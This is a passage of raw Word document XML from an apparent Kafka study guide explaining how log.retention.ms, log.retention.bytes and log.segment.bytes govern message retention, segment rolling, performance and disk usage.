    <w:p w14:paraId="27D0D27C" w14:textId="77777777" w:rsidR="006257DC" w:rsidRPr="00CE4B95" w:rsidRDefault="00000000" w:rsidP="006257DC">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1B8BD4C">
          <v:rect id="_x0000_i3305" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="7509223A" w14:textId="7F634049" w:rsidR="007C61B8" w:rsidRPr="00CE4B95" w:rsidRDefault="00553D4C" w:rsidP="00DB22BB">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:before="0"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="821" w:name="_Toc196308301"/>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>Explain the role of these configurations in managing message retention and log segment sizes, and how they influence performance and disk space</w:t>
      </w:r>
      <w:r w:rsidR="007C61B8" w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>?</w:t>
      </w:r>
      <w:bookmarkEnd w:id="821"/>
    </w:p>
    <w:p w14:paraId="52050612" w14:textId="60B170D0" w:rsidR="00B33140" w:rsidRPr="004269A3" w:rsidRDefault="00B33140" w:rsidP="000865CF">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="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Let's break down how log.retention.ms and log.segment.bytes influence </w:t>
      </w:r>
      <w:r w:rsidRPr="004269A3">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>message retention</w:t>
      </w:r>
      <w:r w:rsidRPr="004269A3">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r w:rsidRPr="004269A3">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>performance</w:t>
      </w:r>
      <w:r w:rsidRPr="004269A3">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">, and </w:t>
      </w:r>
      <w:r w:rsidRPr="004269A3">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>disk space management</w:t>
      </w:r>
      <w:r w:rsidRPr="004269A3">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> in Kafka:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="25C6C3F9" w14:textId="77777777" w:rsidR="00B33140" w:rsidRPr="004269A3" w:rsidRDefault="00000000" w:rsidP="00B33140">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12D11CF">
          <v:rect id="_x0000_i3306" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="5558DC5B" w14:textId="77777777" w:rsidR="00B33140" w:rsidRPr="004269A3" w:rsidRDefault="00B33140" w:rsidP="00B33140">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1. Role in Message Retention</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D0A720A" w14:textId="77777777" w:rsidR="00B33140" w:rsidRPr="004269A3" w:rsidRDefault="00B33140" w:rsidP="00B33140">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log.retention.ms</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="24C5C173" w14:textId="77777777" w:rsidR="00B33140" w:rsidRPr="004269A3" w:rsidRDefault="00B33140" w:rsidP="00207084">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="171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Defines how long messages stay on disk.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="519B2E1F" w14:textId="77777777" w:rsidR="00B33140" w:rsidRPr="004269A3" w:rsidRDefault="00B33140" w:rsidP="00207084">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="171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If set to 24 hours, Kafka will retain messages for at least one day, after which they become </w:t>
      </w:r>
      <w:r w:rsidRPr="004269A3">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>eligible for deletion</w:t>
      </w:r>
      <w:r w:rsidRPr="004269A3">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="494530D4" w14:textId="77777777" w:rsidR="00B33140" w:rsidRPr="004269A3" w:rsidRDefault="00B33140" w:rsidP="00207084">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="171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This applies </w:t>
      </w:r>
      <w:r w:rsidRPr="004269A3">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>regardless of whether the message has been consumed or not</w:t>
      </w:r>
      <w:r w:rsidRPr="004269A3">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">, unless </w:t>
      </w:r>
      <w:r w:rsidRPr="004269A3">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>log compaction</w:t>
      </w:r>
      <w:r w:rsidRPr="004269A3">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> is enabled.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E6F1F7C" w14:textId="77777777" w:rsidR="00B33140" w:rsidRPr="004269A3" w:rsidRDefault="00B33140" w:rsidP="00B33140">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log.retention.bytes (optional)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0817DC86" w14:textId="77777777" w:rsidR="00B33140" w:rsidRPr="004269A3" w:rsidRDefault="00B33140" w:rsidP="00207084">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="171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Sets a </w:t>
      </w:r>
      <w:r w:rsidRPr="004269A3">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>maximum total size per topic or partition</w:t>
      </w:r>
      <w:r w:rsidRPr="004269A3">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1673B98E" w14:textId="77777777" w:rsidR="00B33140" w:rsidRPr="004269A3" w:rsidRDefault="00B33140" w:rsidP="00207084">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="171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Kafka deletes the </w:t>
      </w:r>
      <w:r w:rsidRPr="004269A3">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>oldest segments</w:t>
      </w:r>
      <w:r w:rsidRPr="004269A3">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> once the size exceeds this threshold.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="70A22AE4" w14:textId="77777777" w:rsidR="00B33140" w:rsidRPr="004269A3" w:rsidRDefault="00B33140" w:rsidP="00B33140">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sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>📝</w:t>
      </w:r>
      <w:r w:rsidRPr="004269A3">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> You can configure </w:t>
      </w:r>
      <w:r w:rsidRPr="004269A3">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>both</w:t>
      </w:r>
      <w:r w:rsidRPr="004269A3">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> time- and size-based retention, and </w:t>
      </w:r>
      <w:r w:rsidRPr="004269A3">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>whichever condition is met first</w:t>
      </w:r>
      <w:r w:rsidRPr="004269A3">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> triggers segment deletion.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="18545069" w14:textId="77777777" w:rsidR="00B33140" w:rsidRPr="004269A3" w:rsidRDefault="00000000" w:rsidP="00B33140">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910F854">
          <v:rect id="_x0000_i3307" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="759D8F0D" w14:textId="77777777" w:rsidR="00B33140" w:rsidRPr="004269A3" w:rsidRDefault="00B33140" w:rsidP="00B33140">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2. Role in Log Segment Size</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3885EDCB" w14:textId="77777777" w:rsidR="00B33140" w:rsidRPr="004269A3" w:rsidRDefault="00B33140" w:rsidP="00B33140">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log.segment.bytes</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="05005932" w14:textId="77777777" w:rsidR="00B33140" w:rsidRPr="004269A3" w:rsidRDefault="00B33140" w:rsidP="00207084">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="172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Determines </w:t>
      </w:r>
      <w:r w:rsidRPr="004269A3">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>when a new log segment file is created</w:t>
      </w:r>
      <w:r w:rsidRPr="004269A3">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="796A7B79" w14:textId="77777777" w:rsidR="00B33140" w:rsidRPr="004269A3" w:rsidRDefault="00B33140" w:rsidP="00207084">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="172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Kafka stores data in segments. This setting </w:t>
      </w:r>
      <w:r w:rsidRPr="004269A3">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>splits logs into manageable chunks</w:t>
      </w:r>
      <w:r w:rsidRPr="004269A3">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="050FC686" w14:textId="77777777" w:rsidR="00B33140" w:rsidRPr="004269A3" w:rsidRDefault="00B33140" w:rsidP="00B33140">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lastRenderedPageBreak/>
        <w:t>Why this matters:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="493FB601" w14:textId="77777777" w:rsidR="00B33140" w:rsidRPr="004269A3" w:rsidRDefault="00B33140" w:rsidP="00207084">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="172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Smaller segments → </w:t>
      </w:r>
      <w:r w:rsidRPr="004269A3">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>More frequent segment rolling</w:t>
      </w:r>
      <w:r w:rsidRPr="004269A3">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> → </w:t>
      </w:r>
      <w:r w:rsidRPr="004269A3">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Faster cleanup</w:t>
      </w:r>
      <w:r w:rsidRPr="004269A3">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> during retention.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C362E77" w14:textId="77777777" w:rsidR="00B33140" w:rsidRPr="004269A3" w:rsidRDefault="00B33140" w:rsidP="00207084">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="172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Larger segments → Fewer files, but </w:t>
      </w:r>
      <w:r w:rsidRPr="004269A3">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>slower deletion</w:t>
      </w:r>
      <w:r w:rsidRPr="004269A3">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> because Kafka only deletes entire segments.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="35A14680" w14:textId="77777777" w:rsidR="00B33140" w:rsidRPr="004269A3" w:rsidRDefault="00000000" w:rsidP="00B33140">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B13AF52">
          <v:rect id="_x0000_i3308" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="071A69FB" w14:textId="77777777" w:rsidR="00B33140" w:rsidRPr="004269A3" w:rsidRDefault="00B33140" w:rsidP="00B33140">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3. Impact on Performa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5"/>
        <w:gridCol w:w="8129"/>
      </w:tblGrid>
      <w:tr w:rsidR="004269A3" w:rsidRPr="004269A3" w14:paraId="23AAD1D8" w14:textId="77777777" w:rsidTr="00B33140">
        <w:trPr>
          <w:tblHeader/>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="1B606E9E" w14:textId="77777777" w:rsidR="00B33140" w:rsidRPr="004269A3" w:rsidRDefault="00B33140" w:rsidP="00B33140">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Config</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="5D807239" w14:textId="77777777" w:rsidR="00B33140" w:rsidRPr="004269A3" w:rsidRDefault="00B33140" w:rsidP="00B33140">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Impact</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="004269A3" w:rsidRPr="004269A3" w14:paraId="58626D54" w14:textId="77777777" w:rsidTr="00B33140">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="6B411CD7" w14:textId="77777777" w:rsidR="00B33140" w:rsidRPr="004269A3" w:rsidRDefault="00B33140" w:rsidP="00B33140">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log.segment.bytes</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="3BFC47FC" w14:textId="77777777" w:rsidR="00B33140" w:rsidRPr="004269A3" w:rsidRDefault="00B33140" w:rsidP="00B33140">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Affects </w:t>
            </w:r>
            <w:r w:rsidRPr="004269A3">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>I/O operations</w:t>
            </w:r>
            <w:r w:rsidRPr="004269A3">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve"> and </w:t>
            </w:r>
            <w:r w:rsidRPr="004269A3">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>segment scanning speed</w:t>
            </w:r>
            <w:r w:rsidRPr="004269A3">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve"> during retention checks. Too small → Too many files. Too large → Slower retention cleanup.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="004269A3" w:rsidRPr="004269A3" w14:paraId="78EC4AEA" w14:textId="77777777" w:rsidTr="00B33140">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="5309271A" w14:textId="77777777" w:rsidR="00B33140" w:rsidRPr="004269A3" w:rsidRDefault="00B33140" w:rsidP="00B33140">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log.retention.ms</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="212DE664" w14:textId="77777777" w:rsidR="00B33140" w:rsidRPr="004269A3" w:rsidRDefault="00B33140" w:rsidP="00B33140">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Controls </w:t>
            </w:r>
            <w:r w:rsidRPr="004269A3">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>how long data remains available</w:t>
            </w:r>
            <w:r w:rsidRPr="004269A3">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve"> for consumers. Longer retention = more data = more disk I/O and storage. Shorter retention = faster cleanup, but less fault tolerance.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="1C02E2E1" w14:textId="77777777" w:rsidR="00B33140" w:rsidRPr="004269A3" w:rsidRDefault="00000000" w:rsidP="00B33140">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D39998E">
          <v:rect id="_x0000_i3309" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="35C68C8F" w14:textId="77777777" w:rsidR="00B33140" w:rsidRPr="004269A3" w:rsidRDefault="00B33140" w:rsidP="00B33140">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4. Impact on Disk Space</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D0B13FB" w14:textId="77777777" w:rsidR="00B33140" w:rsidRPr="004269A3" w:rsidRDefault="00B33140" w:rsidP="00207084">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="172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Large log.retention.ms or log.retention.bytes → Kafka stores more data → </w:t>
      </w:r>
      <w:r w:rsidRPr="004269A3">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>More disk usage</w:t>
      </w:r>
      <w:r w:rsidRPr="004269A3">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D0A4958" w14:textId="77777777" w:rsidR="00B33140" w:rsidRPr="004269A3" w:rsidRDefault="00B33140" w:rsidP="00207084">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="172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Smaller values → Messages get deleted sooner → </w:t>
      </w:r>
      <w:r w:rsidRPr="004269A3">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Less disk usage</w:t>
      </w:r>
      <w:r w:rsidRPr="004269A3">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">, but </w:t>
      </w:r>
      <w:r w:rsidRPr="004269A3">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>less available historical data</w:t>
      </w:r>
      <w:r w:rsidRPr="004269A3">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1EAC818C" w14:textId="77777777" w:rsidR="00B33140" w:rsidRPr="004269A3" w:rsidRDefault="00B33140" w:rsidP="00B33140">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sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>📦</w:t>
      </w:r>
      <w:r w:rsidRPr="004269A3">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> Disk pressure can also lead to:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5AF2A3C3" w14:textId="77777777" w:rsidR="00B33140" w:rsidRPr="004269A3" w:rsidRDefault="00B33140" w:rsidP="00207084">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="172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Broker crashes</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="298149C1" w14:textId="77777777" w:rsidR="00B33140" w:rsidRPr="004269A3" w:rsidRDefault="00B33140" w:rsidP="00207084">
      <w:pPr>
        <w:numPr>
